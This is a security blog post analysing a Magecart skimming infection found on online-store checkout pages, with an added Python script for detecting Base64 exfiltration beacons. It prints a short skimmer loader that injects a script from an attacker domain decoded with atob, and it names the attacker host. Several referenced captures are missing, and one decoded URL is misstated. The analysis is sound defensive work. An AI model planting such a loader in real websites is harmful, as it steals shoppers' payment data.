Last week, one of my SpiderLabs colleagues was working on a PCI forensic triage for a website. During his investigation, he asked me to check out some HTTP traffic he captured during an online retail store checkout session.
This was the HTTP capture:
At first glance, the GET request is very suspicious. Firstly, the HTTP Referer URL path contains “/checkout/onepage” (a very common URL target path in Magecart attacks). Secondly, the GET request goes to a third-party domain (mxcounter.com). And thirdly, it requests a “.GIF” file followed by a long Base64-encoded string.
So I immediately decoded the Base64 string, which resulted in the following:
Some obvious data exfiltration is going on there!
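As an added example (not part of the original post or its capture), here are the three indicators above turned into a small Python triage check that runs over request-log lines in a simplified, constructed “METHOD URL Referer: URL” format; the shop hostname, the .gif path and the decoded payload are made up, and only mxcounter.com comes from the post.

```python
import base64
import binascii
import re
from urllib.parse import urlsplit

# Constructed sample lines in a simplified "METHOD URL Referer: URL" format, not
# the original capture; line two models the beacon described in the post.
SAMPLE_LOG = [
    "GET https://shop.example.test/checkout/onepage/ Referer: https://shop.example.test/cart",
    "GET https://mxcounter.com/t.gif?d="
    + base64.b64encode(b"constructed-sample-cardholder-data").decode()
    + " Referer: https://shop.example.test/checkout/onepage/",
    "GET https://cdn.example.test/pixel.gif?v=2 Referer: https://shop.example.test/checkout/onepage/",
]
LINE_RE = re.compile(r"^(?P<method>[A-Z]+)\s+(?P<url>\S+)\s+Referer:\s+(?P<referer>\S+)$")
B64_RE = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")  # only "long" Base64 runs


def decode_b64_blob(blob):
    """Return decoded bytes if blob is well-formed Base64 (padding repaired), else None."""
    body = blob.rstrip("=")
    try:
        return base64.b64decode(body + "=" * (-len(body) % 4), validate=True)
    except (binascii.Error, ValueError):
        return None


def flag_exfil_beacons(log_lines, checkout_marker="/checkout/onepage"):
    """Flag requests matching all three indicators: Referer path contains the
    checkout marker, destination host differs from the Referer host, and the
    path names a .gif followed (in path or query) by a long Base64 run.
    Returns one finding per decodable blob: destination host plus decoded text."""
    findings = []
    for line in log_lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        url, referer = urlsplit(m["url"]), urlsplit(m["referer"])
        if checkout_marker not in referer.path or url.hostname == referer.hostname:
            continue
        gif_at = url.path.lower().find(".gif")
        if gif_at < 0:
            continue
        haystack = url.path[gif_at + 4:] + " " + url.query
        for blob in B64_RE.findall(haystack):
            decoded = decode_b64_blob(blob)
            if decoded is not None:
                findings.append({"host": url.hostname,
                                 "decoded": decoded.decode("utf-8", "replace")})
    return findings
```

A first-party pixel or a short cache-buster such as `?v=2` does not trip the check; only an off-site .gif carrying a long, valid Base64 run from a checkout Referer is reported, together with what it decodes to.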
De-obfuscating the code results in something like this:
Basically what this script does is:
- check whether the current page URL location contains the string ‘out/onepag’ (a substring of checkout/onepage)
- create a <script> element and point its external script source to 'https://mxcounter.com/click.js?v=1.7'
- append the <script> element to the HTML <head>
In short, it injects an external malicious script into the checkout page.
The WHOIS record of mxcounter.com shows that the IP address of the DNS A record is located in Ukraine:
For example, here’s version 1.6 of the script:
and version 1.8:
and version 2.0, and so on.
So with all this in mind, I was curious to find other websites with similar infections. I first tried Googling the URL “mxcounter.com”, but it didn’t really show me interesting results. What I really wanted was to search websites for a string in their HTML code. I stumbled across a website called nerdydata.com which can do that:
The search result returned one website:
And sure enough, the website in the search result is infected:
And there, it returned over 40 websites. I checked each of these websites, and half of them were infected with Magecart malware scripts.
One of the interesting things I learned during this investigation is that some of these Magecart malware scripts are really sneaky.
var img = document.createElement('script')
img.src = atob("aHR0cHM6Ly9teGNvdW50ZXIuY29t")
The string “aHR0cHM6Ly9teGNvdW50ZXIuY29t” is the Base64 encoding of http://mxcounter.com.
That Base64-encoded string is actually the link to the malicious external script source:
Yet, when visiting that URL directly, you get a “503 Service Unavailable” HTTP error.
This code is still obfuscated; however, de-obfuscating it reveals the typical checkout page skimming routine, with exfiltration of data to the attacker’s host.
Most of the infected websites appear to be running old versions of the Magento framework, and exploitation of vulnerabilities in Magento is the most likely cause of the infection, but it is hard to know for sure without conducting further internal investigations. Other possibilities are an admin panel brute-force attack or spear-phishing attacks.